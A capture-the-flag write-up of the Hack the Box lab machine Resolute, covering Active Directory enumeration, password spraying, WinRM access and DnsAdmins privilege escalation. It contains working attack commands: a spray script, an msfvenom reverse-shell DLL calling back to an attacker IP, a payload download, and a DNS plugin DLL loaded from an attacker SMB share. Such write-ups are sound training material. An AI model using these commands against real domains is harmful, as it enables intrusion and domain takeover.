HTB Resolute – No Metasploit

Hack the Box retired Resolute this week. This machine is rated medium and was released in December 2019.

Root looks to be much more difficult than user on this one. Let’s see what we can find.

Reconnaissance

To start things off I start a NMAP scan running default scripts, version detection, saving outputs, maxing the verbosity, and scanning all TCP ports.

kali@kali:~$ nmap -sC -sV -oA simple -vvv -p- 10.10.10.169
Nmap scan report for resolute.megabank.local (10.10.10.169)
Host is up, received conn-refused (0.062s latency).
Scanned at 2020-05-29 13:42:07 EDT for 5739s
Not shown: 65509 closed ports
Reason: 65509 conn-refused
PORT      STATE SERVICE      REASON  VERSION
53/tcp    open  domain?      syn-ack
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2020-05-29 19:25:37Z)
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?    syn-ack
593/tcp   open  ncacn_http   syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack
3268/tcp  open  ldap         syn-ack Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped   syn-ack
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       syn-ack .NET Message Framing
47001/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack Microsoft Windows RPC
49670/tcp open  msrpc        syn-ack Microsoft Windows RPC
49676/tcp open  ncacn_http   syn-ack Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        syn-ack Microsoft Windows RPC
49688/tcp open  msrpc        syn-ack Microsoft Windows RPC
49709/tcp open  msrpc        syn-ack Microsoft Windows RPC
50537/tcp open  tcpwrapped   syn-ack
51117/tcp open  tcpwrapped   syn-ack
52808/tcp open  tcpwrapped   syn-ack
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/29%Time=5ED15F27%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h30m55s, deviation: 4h02m30s, median: 10m54s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 41231/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 52471/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 55070/udp): CLEAN (Failed to receive data)
|   Check 4 (port 26625/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-05-29T12:26:29-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-05-29T19:26:31
|_  start_date: 2020-05-29T17:42:56

Definitely looks like a Windows DC here. I personally start looking at SMB if 445 is open on Windows boxes. Let’s enumerate a bit more with “enumdomusers”.

kali@kali:~$ rpcclient -U "" -N 10.10.10.169
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
rpcclient $> 

Here we have a list of all the domain users. Since there are so few users we can just “queryuser” from the rpcclient console to see what we can find.

 rpcclient $> queryuser marko
        User Name   :   marko
        Full Name   :   Marko Novak
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Account created. Password set to Welcome123!
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Wed, 31 Dec 1969 19:00:00 EST
        Logoff Time              :      Wed, 31 Dec 1969 19:00:00 EST
        Kickoff Time             :      Wed, 13 Sep 30828 22:48:05 EDT
        Password last set Time   :      Fri, 27 Sep 2019 09:17:15 EDT
        Password can change Time :      Sat, 28 Sep 2019 09:17:15 EDT
        Password must change Time:      Wed, 13 Sep 30828 22:48:05 EDT
        unknown_2[0..31]...
        user_rid :      0x457
        group_rid:      0x201
        acb_info :      0x00000210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...

Here we see an interesting description for Mr. Novak.

Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!

kali@kali:~$ rpcclient -U "marko%Welcom123!" -c "getusername;quit" 10.10.10.169
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

No luck logging in with Marko.

Weaponization and Delivery

I wrote up a quick bash script to password spray the users we know exist with the password we found in the description for Marko.

kali@kali:~/tools$ mkdir passspray
kali@kali:~/tools$ cd passspray/
kali@kali:~/tools/passspray$ sudo vi passsprayv2.sh
while read u; do
        echo -n "$u" && rpcclient -U "$u%Welcome123!" -c "getusername;quit" 10.10.10.169
done <users.txt

This script simply looks at the list of users in users.txt, stores each line in variable of “u”. Next, for each user in user.txt the following command runs “rpcclient -U “$u <- gets replaced with each line in user.txt, followed by the possible password. Last get username will let us know if a user authentication succeeds, quits the rpcclient command and lists the target “10.10.10.169”.

kali@kali:~/tools/passspray$ ./passsprayv2.sh 
AdministratorCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
GuestCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
krbtgtCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
DefaultAccountCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
ryanCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
markoCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
sunitaCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
abigailCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
marcusCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
sallyCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
fredCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
angelaCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
feliciaCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
gustavoCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
ulfCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
stevieCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
claireCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
pauloCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
steveCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
annetteCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
annikaCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
perCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
claudeCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
melanieAccount Name: melanie, Authority Name: MEGABANK
zachCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
simonCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
naokiCannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

Success! We have a hit on user Melanie.

kali@kali:~/tools/passspray$ smbclient -U "melanie%Welcome123!" \\\\10.10.10.169\\SYSVOL
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep 25 09:28:21 2019
  ..                                  D        0  Wed Sep 25 09:28:21 2019
  megabank.local                      D        0  Wed Sep 25 09:28:21 2019

                10340607 blocks of size 4096. 7565420 blocks available
smb: \> cd megabank.local\
smb: \megabank.local\> ls
  .                                   D        0  Wed Sep 25 09:34:36 2019
  ..                                  D        0  Wed Sep 25 09:34:36 2019
  DfsrPrivate                       DHS        0  Wed Sep 25 09:34:36 2019
  Policies                            D        0  Wed Sep 25 09:28:32 2019
  scripts                             D        0  Wed Sep 25 09:28:21 2019

                10340607 blocks of size 4096. 7565164 blocks available
smb: \megabank.local\>

Nothing interesting looking through the shares. Let’s take a step back and look more into this user. Kali comes with many great AD enumeration tools. Let’s try ldapdomaindump.

kali@kali:~/htb/resolute/domainenum$ ldapdomaindump -u "MEGABANK\melanie" -p "Welcome123!" 10.10.10.169
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
kali@kali:~/htb/resolute/domainenum$ ls
domain_computers_by_os.html  domain_computers.html  domain_groups.grep  domain_groups.json  domain_policy.html  domain_trusts.grep  domain_trusts.json          domain_users.grep  domain_users.json
domain_computers.grep        domain_computers.json  domain_groups.html  domain_policy.grep  domain_policy.json  domain_trusts.html  domain_users_by_group.html  domain_users.html
kali@kali:~/htb/resolute/domainenum$ cat domain_users.grep 
cn      name    sAMAccountName  memberOf        primaryGroupId  whenCreated     whenChanged     lastLogon       userAccountControl      pwdLastSet      objectSid       description
Naoki Yamamoto  Naoki Yamamoto  naoki           Domain Users    12/04/19 10:40:44       12/04/19 10:40:44       01/01/01 00:00:00       NORMAL_ACCOUNT  12/04/19 10:40:44       S-1-5-21-1392959593-3013219662-3596683436-10104
Simon Faraday   Simon Faraday   simon           Domain Users    12/04/19 10:39:58       12/04/19 10:39:58       01/01/01 00:00:00       NORMAL_ACCOUNT  12/04/19 10:39:58       S-1-5-21-1392959593-3013219662-3596683436-10103
Zach Armstrong  Zach Armstrong  zach            Domain Users    12/04/19 10:39:27       12/04/19 10:39:27       01/01/01 00:00:00       NORMAL_ACCOUNT  12/04/19 10:39:27       S-1-5-21-1392959593-3013219662-3596683436-10102
Melanie Purkis  Melanie Purkis  melanie Remote Management Users Domain Users    12/04/19 10:38:45       05/29/20 20:35:04       01/01/01 00:00:00       NORMAL_ACCOUNT  05/29/20 20:35:04       S-1-5-21-1392959593-3013219662-3596683436-10101

Melanie is a member of the “Remote Management” group. Let’s see what that group has permissions to do.

kali@kali:~/htb/resolute/domainenum$ cat domain_groups.grep | grep "Remote Management"
Contractors     Contractors     DnsAdmins, Remote Management Users      Contractors     09/26/19 12:37:45       09/27/19 14:02:21       S-1-5-21-1392959593-3013219662-3596683436-1103
Remote Management Users Remote Management Users         Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.     09/25/19 13:28:31       12/04/19 10:42:51       S-1-5-32-580

Ahh, winrm should be available for Melanie.

Foothold

Evil-winrm is basically the go to windows remote management tool for linux.

kali@kali:~/htb/resolute/domainenum$ evil-winrm -u melanie -p Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie

Finally got a foothold!

Evil-WinRM* PS C:\Users\melanie\Desktop> dir


    Directory: C:\Users\melanie\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/3/2019   7:33 AM             32 user.txt


*Evil-WinRM* PS C:\Users\melanie\Desktop> type user.txt
0c3b...8540

After manually spot checking the filesystem, I found a unique directory called “PSTranscripts”

*Evil-WinRM* PS C:\> ls -hidden


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        5/29/2020  10:42 AM      402653184 pagefile.sys
*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OjuoBGhU.20191203063201.txt

**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

A snippet of code from the .txt file shows a command for ryan to connect to a backups drive and the password is listed in clear text “Serv3r4Admin4cc123!

Privilege Escalation

Ryan is in the Contractors group, which is in the DNSAdmins group

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

I first tried to upload a reverse shell dll, but I assume the file was being detected as malicious and getting deleted.

kali@kali:~/htb/resolute$ msfvenom -p windows/x64/shell_reverse_tcp -a x64 LHOST=10.10.14.44 LPORT=7788 -f dll > trenchesofit.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 5120 bytes
*Evil-WinRM* PS C:\Users\ryan\Documents> Invoke-WebRequest -Uri "http://10.10.14.44/trenchesofit.dll" -OutFile "C:\Users\ryan\Documents\trenchesofit.dll"
*Evil-WinRM* PS C:\Users\ryan\Documents> dir


    Directory: C:\Users\ryan\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/29/2020   6:09 PM           5120 trenchesofit.dll

When trying to move the file to the system, Windows Defender was discovering and removing the file. I have to change my approach. After some research I decided to recreate the msfvenom dll attempting to add the user to the Domain Admins group.

kali@kali:~/tools/impacket/examples$ msfvenom -p windows/x64/exec cmd='net group "domain admins" ryan /add /domain' --platform windows -f dll > /home/kali/htb/resolute/trenchesofit.dll
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 311 bytes
Final size of dll file: 5120 bytes

So I started up a SMB server to allow the command to access the needed payload to bypass Windows Defender.

kali@kali:~/tools/impacket/examples$ sudo python smbserver.py trenchesofitshare /home/kali/htb/resolute
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd RESOLUTE /config /serverlevelplugindll \\10.10.14.44\trenchesofitshare\trenchesofit.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns
[SC] StartService FAILED 1056:

An instance of the service is already running.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2976
        FLAGS              :
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

The first time I attempted to use ryan as the target for “net group” config, but I could not get this one to work. I tried Melanie and that worked. After running the DNS config command I connected back to the box with evil-winrm as melanie.

kali@kali:~/htb/resolute/domainenum$ evil-winrm -u melanie -p Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> whoami /all

USER INFORMATION
----------------

User Name        SID
================ ===============================================
megabank\melanie S-1-5-21-1392959593-3013219662-3596683436-10101


GROUP INFORMATION
-----------------

Group Name                                      Type             SID                                           Attributes
=============================================== ================ ============================================= ===============================================================
Everyone                                        Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users                 Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                   Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access      Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                          Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                            Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                  Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
MEGABANK\Domain Admins                          Group            S-1-5-21-1392959593-3013219662-3596683436-512 Mandatory group, Enabled by default, Enabled group
MEGABANK\Denied RODC Password Replication Group Alias            S-1-5-21-1392959593-3013219662-3596683436-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication                Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level            Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

With “whoami /all” you can now see that Melanie is domain admin!

*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/3/2019   7:32 AM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
e1d9....619c

Just grab the root flag in the normal location.

Overall, this was a fun box with a challenging privilege escalation method. I found a great resource for using “dnscmd” found here.

If you enjoyed this write-up, please show your respect here: https://www.hackthebox.eu/home/users/profile/272340

Feel free to comment or reach out if you have any questions or issues with any of the above steps. Until next time, stay safe in the Trenches of IT!

Leave a Reply